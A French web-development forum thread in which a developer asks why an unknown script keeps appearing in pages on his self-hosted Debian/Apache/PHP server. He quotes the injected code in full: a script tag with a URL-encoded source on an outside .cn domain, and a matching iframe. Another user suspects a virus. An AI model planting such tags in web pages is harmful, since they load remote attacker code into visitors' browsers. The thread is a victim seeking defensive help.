IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

JavaScript Discussion :

script JS qui s'insère dans mon code


Sujet :

JavaScript

  1. #1
    Nouveau membre du Club
    Inscrit en
    Janvier 2007
    Messages
    53
    Détails du profil
    Informations forums :
    Inscription : Janvier 2007
    Messages : 53
    Points : 38
    Points
    38
    Par défaut script JS qui s'insère dans mon code
    Bonjour à tous,
    Je travail dans un centre de langue et il se passe quelque chose de vraiment étrange sur des applications que je développe.

    Mes applications sont hébergées sur un serveur LAMP.

    en fait mon problème est j'ai un script qui s'insère dans mon code source, je n'arrive pas à trouver d'ou provient ce code javascript. le voici :

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    <script language=javascript src=http://%77%2E%63%39%39%64%2E%63%6E/lg.js></script>
    A certain moment ce script disparait et revient sans aucune raison. J'ai effectué une analyse anti-virus et anti-spyware sur mon pc mais rien ne change.

    De plus des fois j'ai une iframe qui se loge de la mêm façon
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    <iframe src=http://%77%2E%63%39%39%64%2E%63%6E/logo
    .gif"></iframe>
    Quand ces lignes de code s'insèrent dans mon code source, toute ma mise en page est désordonnée (css)

    Pensez vous que cela vienne du serveur ou de mon pc ? De quoi s'agit t'il ?
    Si quelqu'un à déjà eu ce problème pourrait t'il me dire de quoi cela vient.

    Je vous remercie d'avance pour vos réponses.

  2. #2
    Expert confirmé
    Avatar de le_chomeur
    Profil pro
    Développeur informatique
    Inscrit en
    Février 2006
    Messages
    3 653
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations professionnelles :
    Activité : Développeur informatique

    Informations forums :
    Inscription : Février 2006
    Messages : 3 653
    Points : 4 835
    Points
    4 835
    Par défaut
    étrange , c'est quoi cette url : www.w.c99d.cn.com ??

    je pencherais pour un virus ...
    et la source du js donne quoi ?

  3. #3
    Nouveau membre du Club
    Inscrit en
    Janvier 2007
    Messages
    53
    Détails du profil
    Informations forums :
    Inscription : Janvier 2007
    Messages : 53
    Points : 38
    Points
    38
    Par défaut
    J'ai recherché sur google mais rien du tout, quand je fais un copier coller du lien dans mon navigateur j'ai la même adresse www.w.c99d.cn.com je ne sais pas du tout d'ou cela provient.

    Ca me met un peu en panique on va dire

    J'ai bien l'impression que cela vient du serveur un genre de programme qui insère automatiquement les lignes de code lors de l'interpretation du code.

  4. #4
    Expert confirmé
    Avatar de le_chomeur
    Profil pro
    Développeur informatique
    Inscrit en
    Février 2006
    Messages
    3 653
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations professionnelles :
    Activité : Développeur informatique

    Informations forums :
    Inscription : Février 2006
    Messages : 3 653
    Points : 4 835
    Points
    4 835
    Par défaut
    serveur mutualisé ?
    si oui prend contact avec ton hébergeur

  5. #5
    Nouveau membre du Club
    Inscrit en
    Janvier 2007
    Messages
    53
    Détails du profil
    Informations forums :
    Inscription : Janvier 2007
    Messages : 53
    Points : 38
    Points
    38
    Par défaut
    Non c'est un serveur que le centre a monté lui même, les caractéristiques du serveur sont les suivantes

    Linux 2.6.18 avec une distribution Debian etch 4.0

    Dessus nous avons installé
    Apache 2 version : 2.2.3
    Mysql version 5.0.32
    Php 4 et 5.2.0
    Phpmysql 5.2.0

    Je ne connais pas grand chose sur les serveurs c'est toutes les infos que je peux donner.

    Je vais essayer de trouver une solution

Discussions similaires

  1. Un regex qui fonctionne sur les testeurs en ligne, mais pas dans mon code
    Par billybobbonnet dans le forum Développement Windows
    Réponses: 4
    Dernier message: 28/01/2015, 17h20
  2. SWIG probleme pour lancer le script python dans mon code C++ et récupérer un objet
    Par spartan811 dans le forum Interfaçage autre langage
    Réponses: 3
    Dernier message: 11/05/2012, 16h23
  3. code malicieux qui s'insére dans des pages web
    Par nickg dans le forum Sécurité
    Réponses: 2
    Dernier message: 15/03/2008, 17h28
  4. Réponses: 1
    Dernier message: 21/02/2005, 12h40
  5. [langage] algo de bissection dans mon code
    Par killy dans le forum Langage
    Réponses: 5
    Dernier message: 19/01/2004, 18h35

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo